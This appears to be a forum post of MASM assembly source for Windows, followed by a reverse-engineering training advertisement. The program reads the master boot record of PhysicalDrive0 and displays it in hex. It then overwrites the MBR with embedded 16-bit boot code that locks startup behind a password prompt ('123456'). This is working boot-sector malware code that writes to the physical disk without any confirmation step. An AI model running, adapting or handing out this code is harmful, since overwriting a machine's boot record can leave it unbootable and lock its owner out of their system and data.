;QQ:471838370
.386
.model flat,stdcall
option casemap:none
;*******************************************************************
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
CTXT MACRO text
local lbl
.const
lbl db text,0
.code
exitm <offset lbl>
ENDM
;*******************************************************************
.data
szFmt db "%02X",20h,20h,0
szenter db 0dh,0ah,0
Device db '\\.\PhysicalDrive0',0
szcount dd 0
szLine db "_____________________________M____B____R__________________________",0
szLIne1 db "__________________________________________________________________",0
szPassword db 08Ch, 0C8h, 08Eh, 0D8h, 0B8h, 000h, 006h, 0BBh, 000h, 007h, 033h, 0C9h, 0BAh, 04Fh, 018h, 0CDh
db 010h, 0BEh, 067h, 07Dh, 0B7h, 000h, 0BAh, 01Eh, 00Ch, 0B4h, 002h, 0CDh, 010h, 08Ah, 004h, 03Ch
db 000h, 074h, 009h, 046h, 0B3h, 007h, 0B4h, 00Eh, 0CDh, 010h, 0EBh, 0F1h, 08Dh, 036h, 077h, 07Dh
db 0B5h, 006h, 0B4h, 000h, 0CDh, 016h, 08Ah, 00Ch, 03Ah, 0C1h, 075h, 001h, 046h, 0B8h, 02Ah, 00Eh
db 0B3h, 007h, 0CDh, 010h, 0FEh, 0CDh, 080h, 0FDh, 000h, 075h, 0E7h, 08Ah, 00Ch, 080h, 0F9h, 0FFh
db 075h, 0B2h, 033h, 0C0h, 08Eh, 0D0h, 0C3h, 049h, 06Eh, 070h, 075h, 074h, 020h, 070h, 061h, 073h
db 073h, 077h, 06Fh, 072h, 064h, 03Ah, 000h, 031h, 032h, 033h, 034h, 035h, 036h, 0FFh
data0 db 0E8h, 00Dh, 001h, 090h
;*******************************************************************
.data?
hDevice dd ? ;设备句柄
Buffer db 1024 dup(?)
dwReturn dd ?
hReadDervice dd ?
szBuffer db 1024 dup (?)
szString db 2048 dup (?)
szb dd ?
;******************************************************************
.code
start:
invoke CreateFile,offset Device,GENERIC_READ or GENERIC_WRITE,\
FILE_SHARE_READ OR FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL ;打开硬盘设备
.if eax==INVALID_HANDLE_VALUE
invoke MessageBox,NULL,CTXT("Failed - CreateFile - Open the PhysicalDrive0."),\
CTXT("Read Disk MBR"),MB_OK
jmp @exit
.endif
mov hDevice,eax
invoke ReadFile,eax,addr Buffer,sizeof Buffer,addr dwReturn ,NULL ;读数据到缓存区
.if eax==0
invoke MessageBox,NULL,CTXT("Failed - Read the PhysicalDrive0."),\
CTXT("Read Disk MBR"),MB_OK
jmp @exit
.endif
invoke lstrcat,addr szString,addr szLine
invoke lstrcat,addr szString,addr szenter
lea esi,Buffer
mov ecx,512
CLD
@Buf:
lodsb ;取字节
inc szcount
movzx eax,al
push ecx
invoke wsprintf,addr szBuffer ,addr szFmt,eax
invoke lstrcat,addr szString,addr szBuffer
.if szcount == 16
invoke lstrcat,addr szString,addr szenter ;换行
mov szcount,0
.endif
pop ecx
loop @Buf
; invoke lstrcat,addr szString,addr szenter
invoke lstrcat,addr szString,addr szLIne1
invoke MessageBox,NULL,addr szString,CTXT("Read Disk MBR"),MB_OK
invoke CloseHandle,hDevice
;注意继续危险
invoke CreateFile,offset Device,GENERIC_READ or GENERIC_WRITE,\
FILE_SHARE_READ OR FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL
mov hDevice,eax
lea esi,data0
lea edi,Buffer
cld
mov ecx,4
@next:
movsb
loop @next
lea esi,szPassword
lea edi, Buffer
add edi,110h
cld
mov ecx,110
@next1:
movsb
loop @next1
invoke WriteFile,hDevice,addr Buffer,512,addr dwReturn ,NULL ;写设备
invoke CloseHandle,hDevice
@exit:
invoke ExitProcess,NULL
;*****************************************************************
end start
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)